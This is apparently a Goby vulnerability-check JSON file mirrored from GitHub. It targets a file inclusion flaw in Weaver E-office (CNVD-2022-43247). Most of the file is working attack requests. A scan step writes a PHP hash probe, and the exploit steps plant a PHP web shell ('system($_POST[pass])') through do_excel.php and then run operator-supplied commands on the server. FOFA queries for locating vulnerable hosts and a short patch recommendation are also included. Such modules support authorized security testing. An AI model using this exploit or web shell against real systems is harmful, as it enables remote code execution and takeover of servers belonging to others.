mirror of https://github.com/qwqdanchun/Goby.git
231 lines
8.3 KiB
JSON
231 lines
8.3 KiB
JSON
{
|
||
"Name": "Weaver E-office do_excel.php file inclusion vulnerability",
|
||
"Description": "<p>e-office is a standard collaborative mobile office platform.</p><p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.</p>",
|
||
"Product": "Weaver E-office",
|
||
"Homepage": "www.weaver.com.cn",
|
||
"DisclosureDate": "2022-03-23",
|
||
"Author": "1243099890@qq.com",
|
||
"FofaQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
|
||
"GobyQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
|
||
"Level": "3",
|
||
"Impact": "<p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.<br></p>",
|
||
"References": [],
|
||
"Is0day": false,
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "cmd",
|
||
"type": "input",
|
||
"value": "whoami",
|
||
"show": ""
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/general/charge/charge_list/do_excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "html=<?php echo md5(233);unlink(__FILE__);?>"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/general/charge/charge_list/excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "e165421110ba03099a1c0393373c5b43",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/general/charge/charge_list/do_excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "html=<?php system($_POST[pass]);?>"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/general/charge/charge_list/excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "pass={{{cmd}}}"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|<div id=\"Classeur1_16681\" align=center x:publishsource=\"Excel\">(?s)(.*)</div>"
|
||
]
|
||
}
|
||
],
|
||
"Tags": [
|
||
"Remote File Inclusion"
|
||
],
|
||
"VulType": [
|
||
"Remote File Inclusion"
|
||
],
|
||
"CVEIDs": [
|
||
""
|
||
],
|
||
"CNNVD": [
|
||
""
|
||
],
|
||
"CNVD": [
|
||
"CNVD-2022-43247"
|
||
],
|
||
"CVSSScore": "10.0",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "泛微 E-Office 文件包含漏洞(CNVD-2022-43247)",
|
||
"Product": "泛微 E-office",
|
||
"Description": "<p>e-office是上海泛微网络科技股份有限公司一款标准协同移动办公平台。</p><p>e-office存在文件包含漏洞,攻击者可以通过该漏洞写入恶意文件。</p>",
|
||
"Recommendation": "<p>厂商已发布补丁修复漏洞,请及时更新:<span style=\"color: var(--primaryFont-color);\"><a href=\"https://www.weaver.com.cn/\">https://www.weaver.com.cn/</a></span></p>",
|
||
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">e-office存在文件包含漏洞,攻击者可以通过该漏洞写入恶意文件。</span><br></p>",
|
||
"VulType": [
|
||
"远程⽂件包含"
|
||
],
|
||
"Tags": [
|
||
"远程⽂件包含"
|
||
]
|
||
},
|
||
"EN": {
|
||
"Name": "Weaver E-office do_excel.php file inclusion vulnerability",
|
||
"Product": "Weaver E-office",
|
||
"Description": "<p>e-office is a standard collaborative mobile office platform.</p><p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.</p>",
|
||
"Recommendation": "<p>The manufacturer has released a patch to fix the vulnerability, please update it in time:<a href=\"https://www.weaver.com.cn/\" target=\"_blank\">https://www.weaver.com.cn/</a><br></p>",
|
||
"Impact": "<p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.<br></p>",
|
||
"VulType": [
|
||
"Remote File Inclusion"
|
||
],
|
||
"Tags": [
|
||
"Remote File Inclusion"
|
||
]
|
||
}
|
||
},
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |